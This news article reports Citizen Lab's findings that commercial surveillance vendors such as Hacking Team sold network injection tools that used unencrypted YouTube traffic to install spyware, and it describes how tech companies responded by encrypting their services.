A new report from the digital human rights watchdogs at The Citizen Lab at the University of Toronto's Munk School of Global Affairs reveals that "network injection appliances" sold by commercial surveillance vendors are actively exploiting common consumer services, like YouTube, to install malicious software around the world. All of which means, in short, that your love of cat videos might be putting you at risk of being hacked.
In the report, security researcher Morgan Marquis-Boire describes how a network injection attack works. The attacker first gets access to a network, whether that's your Internet Service Provider or local network connection to your computer. From there, he taps into unencrypted network traffic — known as clear-text — and implants a piece of malicious code, or payload, which then travels on to the user's computer.
These sorts of attacks have their selling point and weaknesses. Their advantage over other types of attacks, like so-called spear-phishing or watering-hole attacks, is that those sorts of attacks require that the target do something wrong, such as opening an infected file. Network injection attacks don't require that slip-up. Simply streaming an unencrypted video of a cat sitting in a coffee mug or engaging in other typical browsing behavior is enough. The limit, though, is that once on a user's computer, the attack launched via network injection is quarantined to the users' browser.
But, Marquis-Boire explains, the modern Internet provides plenty of ways out. Everything from advertising networks to browser plugins like advertising networks, Flash, Java, and Quicktime offer clever attackers a "low cost" avenue for an attacker to transit from a user's browser to the rest of their machine. "While this infection method requires user interaction to accept the fake Flash update, it is also possible to bundle the payload with an exploit in order to silently install the surveillance agent," Marquis-Boire writes — so a user might not have any idea that something malicious is happening.
The private sector network injection attacks described in the report seem to resemble the NSA's QUANTUMINSERT system for launching man-in-the-middle attacks that was revealed by former National Security Agency contractor Edward Snowden.
Software able to perform man-in-the-middle style attacks on networks have been available for years, including the open source "Ettercap" tool that allows for the interception and manipulation of traffic on local area networks, which was written in 2001 by Alberto Ornaghi and Marco Valleri. Ornaghi and Valleri are the founders of the Milan-based surveillance company Hacking Team. And it's Hacking Team's commercial "Network Injector" tool that Citizen Lab says leverages YouTube to install a surveillance agent on a target's machine using a targeted payload if they have access to networks at the Internet Service Provider or Internet Exchange level.
And it means that just about any foreign government can now afford its own mini-NSA. One invoice reproduced in the Citizen Lab report billed the government of Turkmenistan the equivalent just under $1 million — 1 percent of 1 percent of the National Security Agency’s annual budget – for a system that could locate and implant spyware on nearly any computer inside its borders. These turn-key tools, sold under the banner of "lawful intercept" tools, sometimes end up in the hands of countries with questionable human rights records, according to Citizen Lab. In their rare comments to the general public, vendors for such tools say they do not sell to customers on U.S., European or United Nations black lists.
Why cat videos? Marquis-Boire says the injection attack would work on any unencrypted Web site. But commercial surveillance companies likely chose Google and Microsoft to target simply because they're the most popular and thus most likely to pay off. "I'll target YouTube rather than Bob's Burgers," he says, explaining the hacker mindset, "because the target is not visiting Bob's Burgers three times a day, but everybody in the world is visiting YouTube three times a day."
As more and more details about the NSA's ability to compromise unencrypted traffic have been revealed over the past year, tech companies have rushed to encrypt more and more of their consumer services, as well as links between their own data centers. Marquis-Boire's reports that some of the consumer services targeted in these sort of network injection attacks have been scrambling to encrypt, and thus protect, its traffic since contacted by the researcher about those weaknesses. Google, for example, has now encrypted a "large majority" of its links to YouTube videos," Marquis-Boire writes, "and the company is said to be accelerating its plans to encrypt the ways that it connects with users.
It's unclear just how widely these commercial hacking tools are used by other governments, or with what level of oversight. While some privacy experts have in the past assumed the capability to launch an effective network-injection attack would be limited to the most advanced government actors, the proliferation of similar tech on the commercial market raises new questions how widespread some practices may become as they become cheaper to replicate — and what responsibility content providers at even smaller levels may have to up their encryption game.